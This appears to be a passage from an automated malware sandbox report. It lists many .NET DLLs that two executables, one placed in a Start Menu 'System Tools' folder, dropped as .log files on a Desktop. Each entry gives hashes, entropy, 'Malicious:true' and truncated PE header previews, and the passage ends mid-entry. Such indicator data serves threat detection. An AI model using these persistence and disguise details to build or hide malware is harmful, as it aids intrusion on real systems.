                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\mQxGLdSr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\mdpOgNja.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\nNYOgdhm.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\nOGxuVGL.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\nYXzmwFp.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\naQWCNyV.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\nbyFPFWu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\njoWmzRS.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ntFYeaQw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\nxfpBjTr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\nxgeHjhA.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\oZZOlFlp.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\oeuNoEPw.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ofivtIHo.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\otZOJrJN.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\pCKGgjCJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\pekolobp.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\pvrGzKVr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\pwZqNBtQ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\qDXyTobI.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
